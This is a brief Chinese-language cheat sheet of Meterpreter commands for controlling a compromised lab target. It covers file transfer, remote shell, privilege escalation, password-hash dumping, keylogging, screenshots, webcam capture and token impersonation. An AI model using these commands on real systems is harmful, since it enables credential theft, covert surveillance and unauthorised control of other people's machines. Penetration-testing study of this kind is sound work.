1、上传文件到靶机:upload -r 待上传文件路径 目标位置
例如:将2.jpg文件上传到对方的C盘上(注意,目标路径是两个\,有一个用于转义)
2、下载靶机的文件:download -r 目标文件路径 本地保存路径
例如:将对方c盘中的2.jpg文件下载到本机的var文件夹中
3、在目标主机上执行exe文件:execute -f exe的文件路径
4、创建cmd新通道
(1)execute -f cmd -c
(2)shell
(进入目标主机的cmd,常用)
5、查看靶机目前的进程:ps
6、获取admin权限:getsystem
7、转存所有hash值:hashdump
8、靶机截屏:screenshot
9、调用靶机摄像头拍照:webcam_snap
10、调用靶机摄像头录像:webcam_stream
11、键盘记录
(1)开启键盘记录: keyscan_start
(2)转存键盘记录:keyscan_dump
(3)停止记录: keyscan_stop
12、搜索文件:search -f 文件名
例如搜索所有jpg图片:search -f *.jpg
搜索2.jpg图片:search -f 2.jpg
搜索所有txt文件同理:search -f *.txt
13、获取用户id:getuid
14、获取系统信息:sysinfo
15、模拟任意用户(token):
先提权:getsystem
1、:use incognito
2、:list_tokens -u
切换到任意用户:impersonate_token “xxxx”